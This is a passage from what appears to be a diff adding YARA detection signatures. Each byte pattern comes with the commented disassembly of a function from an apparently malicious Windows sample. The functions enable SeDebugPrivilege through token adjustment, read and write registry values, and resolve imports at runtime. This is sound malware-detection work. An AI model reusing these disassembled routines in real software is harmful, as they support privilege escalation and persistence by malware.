edi + .text:0x00407a6d 8bc3 mov eax,ebx + .text:0x00407a6f 5e pop esi + .text:0x00407a70 5b pop ebx + .text:0x00407a71 5d pop ebp + .text:0x00407a72 c3 ret + */ + $c40 = { 55 8B EC 53 56 8B 35 ?? ?? ?? ?? 57 6A 00 FF D6 90 6A 00 6A 02 E8 ?? ?? ?? ?? 6A 00 8B D8 FF D6 90 68 28 01 00 00 E8 ?? ?? ?? ?? 83 C4 04 8B F8 6A 00 FF D6 90 6A 00 C7 07 28 01 00 00 FF D6 90 6A 00 FF D6 57 53 E8 ?? ?? ?? ?? 85 C0 74 ?? 6A 00 FF D6 90 90 6A 00 FF D6 8B 4D ?? 8D 47 ?? 51 8B 0D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 6A 00 75 ?? FF D6 6A 00 FF D6 8B 5F ?? 90 57 E8 ?? ?? ?? ?? 83 C4 04 6A 00 FF D6 5F 8B C3 5E 5B 5D C3 FF D6 90 57 53 E8 ?? ?? ?? ?? 85 C0 74 ?? 6A 00 FF D6 90 8B 55 ?? 8D 47 ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 90 6A 00 FF D6 57 53 E8 ?? ?? ?? ?? 85 C0 75 ?? 6A 00 FF D6 90 53 FF 15 ?? ?? ?? ?? 90 57 E8 ?? ?? ?? ?? 83 C4 04 6A 00 FF D6 5F 5E 33 C0 5B 5D C3 90 6A 00 FF D6 8B 5F ?? 57 E8 ?? ?? ?? ?? 83 C4 04 6A 00 FF D6 90 5F 8B C3 5E 5B 5D C3 } + /* +function at 0x00403be0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - modify access privileges + .text:0x00403be0 + .text:0x00403be0 FUNC: int stdcall sub_00403be0( int arg0, int arg1, ) [4 XREFS] + .text:0x00403be0 + .text:0x00403be0 Stack Variables: (offset from initial top of stack) + .text:0x00403be0 8: int arg1 + .text:0x00403be0 4: int arg0 + .text:0x00403be0 -4: int local4 + .text:0x00403be0 -12: int local12 + .text:0x00403be0 -16: int local16 + .text:0x00403be0 -20: int local20 + .text:0x00403be0 + .text:0x00403be0 83ec14 sub esp,20 + .text:0x00403be3 56 push esi + .text:0x00403be4 8b3578904000 mov esi,dword [0x00409078] + .text:0x00403bea 57 push edi + .text:0x00403beb 6a00 push 0 + .text:0x00403bed bf01000000 mov edi,1 + .text:0x00403bf2 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403bf4 8d442408 lea eax,dword [esp + 8] + .text:0x00403bf8 50 push eax + .text:0x00403bf9 6a28 push 40 + .text:0x00403bfb ff15d8904000 call dword [0x004090d8] ;kernel32.GetCurrentProcess() + .text:0x00403c01 50 push eax + .text:0x00403c02 ff1510904000 call dword [0x00409010] ;advapi32.OpenProcessToken(kernel32.GetCurrentProcess(),40,local20) + .text:0x00403c08 85c0 test eax,eax + .text:0x00403c0a 750d jnz 0x00403c19 + .text:0x00403c0c 50 push eax + .text:0x00403c0d ffd6 call esi ;kernel32.Sleep(advapi32.OpenProcessToken(<0x00403bfb>,40,local20)) + .text:0x00403c0f 5f pop edi + .text:0x00403c10 33c0 xor eax,eax + .text:0x00403c12 5e pop esi + .text:0x00403c13 83c414 add esp,20 + .text:0x00403c16 c20800 ret 8 + .text:0x00403c19 loc_00403c19: [1 XREFS] + .text:0x00403c19 8b4c2424 mov ecx,dword [esp + 36] + .text:0x00403c1d 6a00 push 0 + .text:0x00403c1f f7d9 neg ecx + .text:0x00403c21 1bc9 sbb ecx,ecx + .text:0x00403c23 897c2410 mov dword [esp + 16],edi + .text:0x00403c27 83e102 and ecx,2 + .text:0x00403c2a 894c241c mov dword [esp + 28],ecx + .text:0x00403c2e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403c30 8b442420 mov eax,dword [esp + 32] + .text:0x00403c34 8d542410 lea edx,dword [esp + 16] + .text:0x00403c38 52 push edx + .text:0x00403c39 50 push eax + .text:0x00403c3a 6a00 push 0 + .text:0x00403c3c ff1514904000 call dword [0x00409014] ;advapi32.LookupPrivilegeValueA(0,arg0,local12) + .text:0x00403c42 6a00 push 0 + .text:0x00403c44 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403c46 8b542408 mov edx,dword [esp + 8] + .text:0x00403c4a 6a00 push 0 + .text:0x00403c4c 6a00 push 0 + .text:0x00403c4e 8d4c2414 lea ecx,dword [esp + 20] + .text:0x00403c52 6a10 push 16 + .text:0x00403c54 51 push ecx + .text:0x00403c55 6a00 push 0 + .text:0x00403c57 52 push edx + .text:0x00403c58 ff1518904000 call dword [0x00409018] ;advapi32.AdjustTokenPrivileges(0xfefefefe,0,local16,16,0,0) + .text:0x00403c5e 6a00 push 0 + .text:0x00403c60 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403c62 ff15d4904000 call dword [0x004090d4] ;ntdll.RtlGetLastWin32Error() + .text:0x00403c68 85c0 test eax,eax + .text:0x00403c6a 7406 jz 0x00403c72 + .text:0x00403c6c 6a00 push 0 + .text:0x00403c6e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403c70 33ff xor edi,edi + .text:0x00403c72 loc_00403c72: [1 XREFS] + .text:0x00403c72 6a00 push 0 + .text:0x00403c74 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403c76 8b442408 mov eax,dword [esp + 8] + .text:0x00403c7a 50 push eax + .text:0x00403c7b ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(0xfefefefe) + .text:0x00403c81 8bc7 mov eax,edi + .text:0x00403c83 5f pop edi + .text:0x00403c84 5e pop esi + .text:0x00403c85 83c414 add esp,20 + .text:0x00403c88 c20800 ret 8 + */ + $c41 = { 83 EC 14 56 8B 35 ?? ?? ?? ?? 57 6A 00 BF 01 00 00 00 FF D6 8D 44 24 ?? 50 6A 28 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 FF D6 5F 33 C0 5E 83 C4 14 C2 08 00 8B 4C 24 ?? 6A 00 F7 D9 1B C9 89 7C 24 ?? 83 E1 02 89 4C 24 ?? FF D6 8B 44 24 ?? 8D 54 24 ?? 52 50 6A 00 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 54 24 ?? 6A 00 6A 00 8D 4C 24 ?? 6A 10 51 6A 00 52 FF 15 ?? ?? ?? ?? 6A 00 FF D6 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A 00 FF D6 33 FF 6A 00 FF D6 8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 83 C4 14 C2 08 00 } + /* +function at 0x004063d0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - modify access privileges + .text:0x004063d0 + .text:0x004063d0 FUNC: int msfastcall sub_004063d0( int ecx, int edx, ) [2 XREFS] + .text:0x004063d0 + .text:0x004063d0 Stack Variables: (offset from initial top of stack) + .text:0x004063d0 -4: int local4 + .text:0x004063d0 -5: int local5 + .text:0x004063d0 -6: int local6 + .text:0x004063d0 -7: int local7 + .text:0x004063d0 -8: int local8 + .text:0x004063d0 -9: int local9 + .text:0x004063d0 -10: int local10 + .text:0x004063d0 -11: int local11 + .text:0x004063d0 -12: int local12 + .text:0x004063d0 -13: int local13 + .text:0x004063d0 -14: int local14 + .text:0x004063d0 -15: int local15 + .text:0x004063d0 -16: int local16 + .text:0x004063d0 -17: int local17 + .text:0x004063d0 -18: int local18 + .text:0x004063d0 -19: int local19 + .text:0x004063d0 -20: int local20 + .text:0x004063d0 -24: int local24 + .text:0x004063d0 -32: int local32 + .text:0x004063d0 -36: int local36 + .text:0x004063d0 -40: int local40 + .text:0x004063d0 + .text:0x004063d0 83ec28 sub esp,40 + .text:0x004063d3 56 push esi + .text:0x004063d4 8b3578904000 mov esi,dword [0x00409078] + .text:0x004063da 57 push edi + .text:0x004063db 6a00 push 0 + .text:0x004063dd ffd6 call esi ;kernel32.Sleep(0) + .text:0x004063df ff15d8904000 call dword [0x004090d8] ;kernel32.GetCurrentProcess() + .text:0x004063e5 6a00 push 0 + .text:0x004063e7 8bf8 mov edi,eax + .text:0x004063e9 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004063eb 8d442408 lea eax,dword [esp + 8] + .text:0x004063ef 50 push eax + .text:0x004063f0 6a28 push 40 + .text:0x004063f2 57 push edi + .text:0x004063f3 ff1510904000 call dword [0x00409010] ;advapi32.OpenProcessToken(kernel32.GetCurrentProcess(),40,local40) + .text:0x004063f9 85c0 test eax,eax + .text:0x004063fb 0f84d8000000 jz 0x004064d9 + .text:0x00406401 6a00 push 0 + .text:0x00406403 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406405 6a00 push 0 + .text:0x00406407 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406409 6a00 push 0 + .text:0x0040640b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040640d 6a00 push 0 + .text:0x0040640f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406411 6a00 push 0 + .text:0x00406413 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406415 6a00 push 0 + .text:0x00406417 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406419 b169 mov cl,105 + .text:0x0040641b b267 mov dl,103 + .text:0x0040641d 884c2425 mov byte [esp + 37],cl + .text:0x00406421 884c2427 mov byte [esp + 39],cl + .text:0x00406425 88542422 mov byte [esp + 34],dl + .text:0x00406429 8854242a mov byte [esp + 42],dl + .text:0x0040642d 8d4c2410 lea ecx,dword [esp + 16] + .text:0x00406431 8d54241c lea edx,dword [esp + 28] + .text:0x00406435 51 push ecx + .text:0x00406436 b065 mov al,101 + .text:0x00406438 52 push edx + .text:0x00406439 6a00 push 0 + .text:0x0040643b c644242853 mov byte [esp + 40],83 + .text:0x00406440 88442429 mov byte [esp + 41],al + .text:0x00406444 c644242a44 mov byte [esp + 42],68 + .text:0x00406449 8844242b mov byte [esp + 43],al + .text:0x0040644d c644242c62 mov byte [esp + 44],98 + .text:0x00406452 c644242d75 mov byte [esp + 45],117 + .text:0x00406457 c644242f50 mov byte [esp + 47],80 + .text:0x0040645c c644243072 mov byte [esp + 48],114 + .text:0x00406461 c644243276 mov byte [esp + 50],118 + .text:0x00406466 c64424346c mov byte [esp + 52],108 + .text:0x0040646b 88442435 mov byte [esp + 53],al + .text:0x0040646f 88442437 mov byte [esp + 55],al + .text:0x00406473 c644243800 mov byte [esp + 56],0 + .text:0x00406478 ff1514904000 call dword [0x00409014] ;advapi32.LookupPrivilegeValueA(0,local20,local32) + .text:0x0040647e 85c0 test eax,eax + .text:0x00406480 7440 jz 0x004064c2 + .text:0x00406482 6a00 push 0 + .text:0x00406484 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406486 6a00 push 0 + .text:0x00406488 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040648a 6a00 push 0 + .text:0x0040648c c744241001000000 mov dword [esp + 16],1 + .text:0x00406494 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406496 6a00 push 0 + .text:0x00406498 c744241c02000000 mov dword [esp + 28],2 + .text:0x004064a0 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004064a2 6a00 push 0 + .text:0x004064a4 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004064a6 8b4c2408 mov ecx,dword [esp + 8] + .text:0x004064aa 6a00 push 0 + .text:0x004064ac 6a00 push 0 + .text:0x004064ae 8d442414 lea eax,dword [esp + 20] + .text:0x004064b2 6a00 push 0 + .text:0x004064b4 50 push eax + .text:0x004064b5 6a00 push 0 + .text:0x004064b7 51 push ecx + .text:0x004064b8 ff1518904000 call dword [0x00409018] ;advapi32.AdjustTokenPrivileges(0xfefefefe,0,local36,0,0,0) + .text:0x004064be 6a00 push 0 + .text:0x004064c0 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004064c2 loc_004064c2: [1 XREFS] + .text:0x004064c2 6a00 push 0 + .text:0x004064c4 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004064c6 6a00 push 0 + .text:0x004064c8 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004064ca 8b542408 mov edx,dword [esp + 8] + .text:0x004064ce 52 push edx + .text:0x004064cf ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004064d5 6a00 push 0 + .text:0x004064d7 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004064d9 loc_004064d9: [1 XREFS] + .text:0x004064d9 6a00 push 0 + .text:0x004064db ffd6 call esi ;kernel32.Sleep(0) + .text:0x004064dd 5f pop edi + .text:0x004064de 5e pop esi + .text:0x004064df 83c428 add esp,40 + .text:0x004064e2 c3 ret + */ + $c42 = { 83 EC 28 56 8B 35 ?? ?? ?? ?? 57 6A 00 FF D6 FF 15 ?? ?? ?? ?? 6A 00 8B F8 FF D6 8D 44 24 ?? 50 6A 28 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A 00 FF D6 6A 00 FF D6 6A 00 FF D6 6A 00 FF D6 6A 00 FF D6 6A 00 FF D6 B1 69 B2 67 88 4C 24 ?? 88 4C 24 ?? 88 54 24 ?? 88 54 24 ?? 8D 4C 24 ?? 8D 54 24 ?? 51 B0 65 52 6A 00 C6 44 24 ?? 53 88 44 24 ?? C6 44 24 ?? 44 88 44 24 ?? C6 44 24 ?? 62 C6 44 24 ?? 75 C6 44 24 ?? 50 C6 44 24 ?? 72 C6 44 24 ?? 76 C6 44 24 ?? 6C 88 44 24 ?? 88 44 24 ?? C6 44 24 ?? 00 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A 00 FF D6 6A 00 FF D6 6A 00 C7 44 24 ?? 01 00 00 00 FF D6 6A 00 C7 44 24 ?? 02 00 00 00 FF D6 6A 00 FF D6 8B 4C 24 ?? 6A 00 6A 00 8D 44 24 ?? 6A 00 50 6A 00 51 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 FF D6 6A 00 FF D6 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 FF D6 5F 5E 83 C4 28 C3 } + /* +function at 0x00404a90@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - query or enumerate registry value + .text:0x00404a90 + .text:0x00404a90 FUNC: int cdecl sub_00404a90( int arg0, int arg1, int arg2, int arg3, int arg4, int arg5, int arg6, int arg7, ) [2 XREFS] + .text:0x00404a90 + .text:0x00404a90 Stack Variables: (offset from initial top of stack) + .text:0x00404a90 32: int arg7 + .text:0x00404a90 28: int arg6 + .text:0x00404a90 24: int arg5 + .text:0x00404a90 20: int arg4 + .text:0x00404a90 16: int arg3 + .text:0x00404a90 12: int arg2 + .text:0x00404a90 8: int arg1 + .text:0x00404a90 4: int arg0 + .text:0x00404a90 -8: int local8 + .text:0x00404a90 -20: int local20 + .text:0x00404a90 -32: int local32 + .text:0x00404a90 -36: int local36 + .text:0x00404a90 -295: int local295 + .text:0x00404a90 -296: int local296 + .text:0x00404a90 -592: int local592 + .text:0x00404a90 + .text:0x00404a90 55 push ebp + .text:0x00404a91 8bec mov ebp,esp + .text:0x00404a93 6aff push 0xffffffff + .text:0x00404a95 6898924000 push 0x00409298 + .text:0x00404a9a 68907e4000 push 0x00407e90 + .text:0x00404a9f 64a100000000 fs: mov eax,dword [0x00000000] + .text:0x00404aa5 50 push eax + .text:0x00404aa6 64892500000000 fs: mov dword [0x00000000],esp + .text:0x00404aad 81ec3c020000 sub esp,572 + .text:0x00404ab3 53 push ebx + .text:0x00404ab4 56 push esi + .text:0x00404ab5 57 push edi + .text:0x00404ab6 33db xor ebx,ebx + .text:0x00404ab8 895de0 mov dword [ebp - 32],ebx + .text:0x00404abb 889ddcfeffff mov byte [ebp - 292],bl + .text:0x00404ac1 b940000000 mov ecx,64 + .text:0x00404ac6 33c0 xor eax,eax + .text:0x00404ac8 8dbdddfeffff lea edi,dword [ebp - 291] + .text:0x00404ace f3ab rep: stosd + .text:0x00404ad0 66ab stosd + .text:0x00404ad2 aa stosb + .text:0x00404ad3 53 push ebx + .text:0x00404ad4 8b3578904000 mov esi,dword [0x00409078] + .text:0x00404ada ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404adc 895dfc mov dword [ebp - 4],ebx + .text:0x00404adf 53 push ebx + .text:0x00404ae0 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404ae2 8d85b4fdffff lea eax,dword [ebp - 588] + .text:0x00404ae8 50 push eax + .text:0x00404ae9 6819000200 push 0x00020019 + .text:0x00404aee 53 push ebx + .text:0x00404aef 8b4d0c mov ecx,dword [ebp + 12] + .text:0x00404af2 51 push ecx + .text:0x00404af3 8b5508 mov edx,dword [ebp + 8] + .text:0x00404af6 52 push edx + .text:0x00404af7 ff1504904000 call dword [0x00409004] ;advapi32.RegOpenKeyExA(arg0,arg1,0,0x00020019,local592) + .text:0x00404afd 85c0 test eax,eax + .text:0x00404aff 53 push ebx + .text:0x00404b00 740b jz 0x00404b0d + .text:0x00404b02 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404b04 c745e0ffffffff mov dword [ebp - 32],0xffffffff + .text:0x00404b0b eb74 jmp 0x00404b81 + .text:0x00404b0d loc_00404b0d: [1 XREFS] + .text:0x00404b0d ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404b0f 395d24 cmp dword [ebp + 36],ebx + .text:0x00404b12 756d jnz 0x00404b81 + .text:0x00404b14 8b4514 mov eax,dword [ebp + 20] + .text:0x00404b17 3bc3 cmp eax,ebx + .text:0x00404b19 7666 jbe 0x00404b81 + .text:0x00404b1b 83f802 cmp eax,2 + .text:0x00404b1e 7761 ja 0x00404b81 + .text:0x00404b20 53 push ebx + .text:0x00404b21 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404b23 c745e404010000 mov dword [ebp - 28],260 + .text:0x00404b2a 53 push ebx + .text:0x00404b2b ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404b2d 8d45e4 lea eax,dword [ebp - 28] + .text:0x00404b30 50 push eax + .text:0x00404b31 8d8ddcfeffff lea ecx,dword [ebp - 292] + .text:0x00404b37 51 push ecx + .text:0x00404b38 8d5514 lea edx,dword [ebp + 20] + .text:0x00404b3b 52 push edx + .text:0x00404b3c 53 push ebx + .text:0x00404b3d 8b4510 mov eax,dword [ebp + 16] + .text:0x00404b40 50 push eax + .text:0x00404b41 8b8db4fdffff mov ecx,dword [ebp - 588] + .text:0x00404b47 51 push ecx + .text:0x00404b48 ff1508904000 call dword [0x00409008] ;advapi32.RegQueryValueExA(0xfefefefe,arg2,0,arg3,local296,local32) + .text:0x00404b4e 85c0 test eax,eax + .text:0x00404b50 752f jnz 0x00404b81 + .text:0x00404b52 53 push ebx + .text:0x00404b53 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404b55 8d95dcfeffff lea edx,dword [ebp - 292] + .text:0x00404b5b 52 push edx + .text:0x00404b5c 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00404b62 e859f9ffff call 0x004044c0 ;sub_004044c0(0,local296) + .text:0x00404b67 50 push eax + .text:0x00404b68 8b4518 mov eax,dword [ebp + 24] + .text:0x00404b6b 50 push eax + .text:0x00404b6c 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00404b72 e8f9fbffff call 0x00404770 ;sub_00404770(arg4,sub_004044c0(0,local296)) + .text:0x00404b77 53 push ebx + .text:0x00404b78 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404b7a c745e001000000 mov dword [ebp - 32],1 + .text:0x00404b81 loc_00404b81: [5 XREFS] + .text:0x00404b81 c745fcffffffff mov dword [ebp - 4],0xffffffff + .text:0x00404b88 e81f000000 call 0x00404bac ;sub_00404bac() + .text:0x00404b8d 53 push ebx + .text:0x00404b8e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404b90 8b45e0 mov eax,dword [ebp - 32] + .text:0x00404b93 8b4df0 mov ecx,dword [ebp - 16] + .text:0x00404b96 64890d00000000 fs: mov dword [0x00000000],ecx + .text:0x00404b9d 5f pop edi + .text:0x00404b9e 5e pop esi + .text:0x00404b9f 5b pop ebx + .text:0x00404ba0 8be5 mov esp,ebp + .text:0x00404ba2 5d pop ebp + .text:0x00404ba3 c3 ret + */ + $c43 = { 55 8B EC 6A FF 68 98 92 40 00 68 90 7E 40 00 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 81 EC 3C 02 00 00 53 56 57 33 DB 89 5D ?? 88 9D ?? ?? ?? ?? B9 40 00 00 00 33 C0 8D BD ?? ?? ?? ?? F3 AB 66 AB AA 53 8B 35 ?? ?? ?? ?? FF D6 89 5D ?? 53 FF D6 8D 85 ?? ?? ?? ?? 50 68 19 00 02 00 53 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 53 74 ?? FF D6 C7 45 ?? FF FF FF FF EB ?? FF D6 39 5D ?? 75 ?? 8B 45 ?? 3B C3 76 ?? 83 F8 02 77 ?? 53 FF D6 C7 45 ?? 04 01 00 00 53 FF D6 8D 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8D 55 ?? 52 53 8B 45 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 FF D6 8D 95 ?? ?? ?? ?? 52 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 FF D6 C7 45 ?? 01 00 00 00 C7 45 ?? FF FF FF FF E8 ?? ?? ?? ?? 53 FF D6 8B 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00404be0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - set registry value + .text:0x00404be0 + .text:0x00404be0 FUNC: int cdecl sub_00404be0( int arg0, int arg1, int arg2, int arg3, int arg4, int arg5, int arg6, ) [6 XREFS] + .text:0x00404be0 + .text:0x00404be0 Stack Variables: (offset from initial top of stack) + .text:0x00404be0 28: int arg6 + .text:0x00404be0 24: int arg5 + .text:0x00404be0 20: int arg4 + .text:0x00404be0 16: int arg3 + .text:0x00404be0 12: int arg2 + .text:0x00404be0 8: int arg1 + .text:0x00404be0 4: int arg0 + .text:0x00404be0 -8: int local8 + .text:0x00404be0 -20: int local20 + .text:0x00404be0 -32: int local32 + .text:0x00404be0 -36: int local36 + .text:0x00404be0 -40: int local40 + .text:0x00404be0 + .text:0x00404be0 55 push ebp + .text:0x00404be1 8bec mov ebp,esp + .text:0x00404be3 6aff push 0xffffffff + .text:0x00404be5 68a8924000 push 0x004092a8 + .text:0x00404bea 68907e4000 push 0x00407e90 + .text:0x00404bef 64a100000000 fs: mov eax,dword [0x00000000] + .text:0x00404bf5 50 push eax + .text:0x00404bf6 64892500000000 fs: mov dword [0x00000000],esp + .text:0x00404bfd 83ec14 sub esp,20 + .text:0x00404c00 53 push ebx + .text:0x00404c01 56 push esi + .text:0x00404c02 57 push edi + .text:0x00404c03 33db xor ebx,ebx + .text:0x00404c05 895de4 mov dword [ebp - 28],ebx + .text:0x00404c08 895dfc mov dword [ebp - 4],ebx + .text:0x00404c0b 8b4520 mov eax,dword [ebp + 32] + .text:0x00404c0e 2bc3 sub eax,ebx + .text:0x00404c10 7405 jz 0x00404c17 + .text:0x00404c12 48 dec eax + .text:0x00404c13 7425 jz 0x00404c3a + .text:0x00404c15 eb78 jmp 0x00404c8f + .text:0x00404c17 loc_00404c17: [1 XREFS] + .text:0x00404c17 8d45e0 lea eax,dword [ebp - 32] + .text:0x00404c1a 50 push eax + .text:0x00404c1b 8d4ddc lea ecx,dword [ebp - 36] + .text:0x00404c1e 51 push ecx + .text:0x00404c1f 53 push ebx + .text:0x00404c20 683f000f00 push 0x000f003f + .text:0x00404c25 53 push ebx + .text:0x00404c26 53 push ebx + .text:0x00404c27 53 push ebx + .text:0x00404c28 8b550c mov edx,dword [ebp + 12] + .text:0x00404c2b 52 push edx + .text:0x00404c2c 8b4508 mov eax,dword [ebp + 8] + .text:0x00404c2f 50 push eax + .text:0x00404c30 ff151c904000 call dword [0x0040901c] ;advapi32.RegCreateKeyExA(arg0,arg1,0,0,0,0x000f003f,0,local40,local36) + .text:0x00404c36 85c0 test eax,eax + .text:0x00404c38 7555 jnz 0x00404c8f + .text:0x00404c3a loc_00404c3a: [1 XREFS] + .text:0x00404c3a 8d4ddc lea ecx,dword [ebp - 36] + .text:0x00404c3d 51 push ecx + .text:0x00404c3e 681f000200 push 0x0002001f + .text:0x00404c43 53 push ebx + .text:0x00404c44 8b550c mov edx,dword [ebp + 12] + .text:0x00404c47 52 push edx + .text:0x00404c48 8b4508 mov eax,dword [ebp + 8] + .text:0x00404c4b 50 push eax + .text:0x00404c4c ff1504904000 call dword [0x00409004] ;advapi32.RegOpenKeyExA(arg0,arg1,0,0x0002001f,local40) + .text:0x00404c52 85c0 test eax,eax + .text:0x00404c54 7539 jnz 0x00404c8f + .text:0x00404c56 8b7d14 mov edi,dword [ebp + 20] + .text:0x00404c59 3bfb cmp edi,ebx + .text:0x00404c5b 7632 jbe 0x00404c8f + .text:0x00404c5d 83ff02 cmp edi,2 + .text:0x00404c60 772d ja 0x00404c8f + .text:0x00404c62 8b7518 mov esi,dword [ebp + 24] + .text:0x00404c65 56 push esi + .text:0x00404c66 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00404c6c e87ffaffff call 0x004046f0 ;sub_004046f0(arg4) + .text:0x00404c71 40 inc eax + .text:0x00404c72 50 push eax + .text:0x00404c73 56 push esi + .text:0x00404c74 57 push edi + .text:0x00404c75 53 push ebx + .text:0x00404c76 8b4d10 mov ecx,dword [ebp + 16] + .text:0x00404c79 51 push ecx + .text:0x00404c7a 8b55dc mov edx,dword [ebp - 36] + .text:0x00404c7d 52 push edx + .text:0x00404c7e ff1500904000 call dword [0x00409000] ;advapi32.RegSetValueExA(0xfefefefe,arg2,0,arg3,arg4,sub_004046f0(arg4)) + .text:0x00404c84 85c0 test eax,eax + .text:0x00404c86 7507 jnz 0x00404c8f + .text:0x00404c88 c745e401000000 mov dword [ebp - 28],1 + .text:0x00404c8f loc_00404c8f: [6 XREFS] + .text:0x00404c8f c745fcffffffff mov dword [ebp - 4],0xffffffff + .text:0x00404c96 e814000000 call 0x00404caf ;sub_00404caf() + .text:0x00404c9b 8b45e4 mov eax,dword [ebp - 28] + .text:0x00404c9e 8b4df0 mov ecx,dword [ebp - 16] + .text:0x00404ca1 64890d00000000 fs: mov dword [0x00000000],ecx + .text:0x00404ca8 5f pop edi + .text:0x00404ca9 5e pop esi + .text:0x00404caa 5b pop ebx + .text:0x00404cab 8be5 mov esp,ebp + .text:0x00404cad 5d pop ebp + .text:0x00404cae c3 ret + */ + $c44 = { 55 8B EC 6A FF 68 A8 92 40 00 68 90 7E 40 00 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 14 53 56 57 33 DB 89 5D ?? 89 5D ?? 8B 45 ?? 2B C3 74 ?? 48 74 ?? EB ?? 8D 45 ?? 50 8D 4D ?? 51 53 68 3F 00 0F 00 53 53 53 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8D 4D ?? 51 68 1F 00 02 00 53 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 7D ?? 3B FB 76 ?? 83 FF 02 77 ?? 8B 75 ?? 56 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 50 56 57 53 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? C7 45 ?? 01 00 00 00 C7 45 ?? FF FF FF FF E8 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00404130@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - link function at runtime on Windows + .text:0x00404130 + .text:0x00404130 FUNC: int cdecl sub_00404130( int arg0, ) [2 XREFS] + .text:0x00404130 + .text:0x00404130 Stack Variables: (offset from initial top of stack) + .text:0x00404130 4: int arg0 + .text:0x00404130 -4: int local4 + .text:0x00404130 + .text:0x00404130 51 push ecx + .text:0x00404131 53 push ebx + .text:0x00404132 55 push ebp + .text:0x00404133 56 push esi + .text:0x00404134 57 push edi + .text:0x00404135 8b7c2418 mov edi,dword [esp + 24] + .text:0x00404139 bb01000000 mov ebx,1 + .text:0x0040413e 8b07 mov eax,dword [edi] + .text:0x00404140 8b6f04 mov ebp,dword [edi + 4] + .text:0x00404143 0580000000 add eax,128 + .text:0x00404148 8b4804 mov ecx,dword [eax + 4] + .text:0x0040414b 85c9 test ecx,ecx + .text:0x0040414d 0f86da000000 jbe 0x0040422d + .text:0x00404153 8b30 mov esi,dword [eax] + .text:0x00404155 6a14 push 20 + .text:0x00404157 03f5 add esi,ebp + .text:0x00404159 56 push esi + .text:0x0040415a 89742418 mov dword [esp + 24],esi + .text:0x0040415e ff15f0904000 call dword [0x004090f0] ;kernel32.IsBadReadPtr(0xc2c2c2c2,20) + .text:0x00404164 85c0 test eax,eax + .text:0x00404166 0f85c1000000 jnz 0x0040422d + .text:0x0040416c loc_0040416c: [1 XREFS] + .text:0x0040416c 8b460c mov eax,dword [esi + 12] + .text:0x0040416f 85c0 test eax,eax + .text:0x00404171 0f84be000000 jz 0x00404235 + .text:0x00404177 03c5 add eax,ebp + .text:0x00404179 50 push eax + .text:0x0040417a ff15ec904000 call dword [0x004090ec] ;kernel32.LoadLibraryA(0xc2c2c2c2) + .text:0x00404180 8bd8 mov ebx,eax + .text:0x00404182 85db test 